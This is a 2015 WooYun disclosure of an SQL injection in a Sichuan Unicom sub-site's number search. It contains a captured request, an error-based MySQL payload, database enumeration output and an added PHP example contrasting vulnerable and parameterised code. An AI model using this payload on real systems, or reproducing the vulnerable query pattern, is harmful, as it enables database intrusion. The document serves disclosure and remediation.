
Vulnerability summary

Defect ID: wooyun-2015-0134004

Title: SQL injection on a Sichuan Unicom sub-site

Vendor: China Unicom

Author: oyeahtime

Submitted: 2015-08-16 09:41

Fixed: 2015-10-02 10:28

Published: 2015-10-02 10:28

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 7

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-08-16: Details sent to the vendor, awaiting the vendor's response
2015-08-18: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible unit; details disclosed only to the reporting agency
2015-08-28: Details disclosed to core white hats and domain experts
2015-09-07: Details disclosed to regular white hats
2015-09-17: Details disclosed to intern white hats
2015-10-02: Details disclosed to the public

Brief description:

Incomplete parameter filtering on a Sichuan Unicom sub-site leads to SQL injection.

Detailed description:

http://**.**.**.**/, under the "preferred numbers" (优选号码) section.

[image: 注入点.png (injection point)]


Burp capture:
GET /index.php?act=search&cate_id=344&search_input=100.00&number_part=185&user_set=0810&provence=510000&city=510100 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/index.php?act=search&cate_id=344
Connection: keep-alive
The search_input parameter is injectable.
Payload:
act=search&cate_id=344&search_input=100.00 OR (SELECT 7534 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT (ELT(7534=7534,1))),0x7178766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&number_part=185&user_set=0810&provence=510000&city=510100

[22:29:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.23
back-end DBMS: MySQL 5.0
[22:29:31] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] womall


Proof of vulnerability:

165 tables; I did not go any further.
[22:36:23] [INFO] fetching tables for data
Database: womall
[165 tables]

Fix recommendation:

Filter every parameter.
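As an added illustration (not code from the report or from the affected site), the PHP/PDO search-handler pattern that produces this class of injection, next to a version that validates and binds every parameter. The table and column names (wm_phonenumber, cate_id, price, number) and the SQLite demo database are assumptions chosen to mirror the request parameters in the report.

```php
<?php
// Added example, not the affected site's code. Table and column names are
// assumptions modelled on the request parameters shown in the report.

// VULNERABLE: request values are spliced into the SQL text, so a value such as
// "100.00 OR (SELECT ...)" for search_input is parsed as SQL (the error-based
// injection reported above).
function searchVulnerable(PDO $db, array $get): array
{
    $sql = 'SELECT number, price FROM wm_phonenumber'
         . ' WHERE cate_id = ' . $get['cate_id']
         . ' AND price = ' . $get['search_input']
         . " AND number LIKE '%" . $get['number_part'] . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: every parameter is type-checked, then bound as a value, so request
// content can never alter the query structure.
function searchFixed(PDO $db, array $get): array
{
    $cateId = filter_var($get['cate_id'] ?? '', FILTER_VALIDATE_INT);
    $price  = filter_var($get['search_input'] ?? '', FILTER_VALIDATE_FLOAT);
    $part   = (string) ($get['number_part'] ?? '');
    if ($cateId === false || $price === false || !preg_match('/^[0-9]{0,11}$/', $part)) {
        throw new InvalidArgumentException('rejected search parameters');
    }
    $stmt = $db->prepare(
        'SELECT number, price FROM wm_phonenumber'
        . ' WHERE cate_id = :cate_id AND price = :price AND number LIKE :part'
    );
    $stmt->execute([
        ':cate_id' => $cateId,
        ':price'   => $price,
        ':part'    => '%' . $part . '%', // the wildcard lives in the bound value, not the SQL text
    ]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demo against an in-memory SQLite database with one constructed row.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE wm_phonenumber (cate_id INT, price REAL, number TEXT)');
$db->exec("INSERT INTO wm_phonenumber VALUES (344, 100.00, '18512345678')");

$benign  = ['cate_id' => '344', 'search_input' => '100.00', 'number_part' => '185'];
$tainted = ['cate_id' => '344', 'search_input' => '100.00 OR 1=1', 'number_part' => '185'];

echo count(searchFixed($db, $benign)) . " row(s) for the normal request\n";
try {
    searchFixed($db, $tainted);
} catch (InvalidArgumentException $e) {
    echo 'tainted input rejected: ' . $e->getMessage() . "\n";
}
```

With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false so that binding is done server-side rather than by client-side string quoting.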

Copyright notice: please credit the source when reposting: oyeahtime@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-08-18 10:27

Vendor reply:

CNVD confirmed and reproduced the reported issue; it has been passed via CNCERT to the Sichuan branch center, which will coordinate handling with the site's operating unit.

Latest status:

None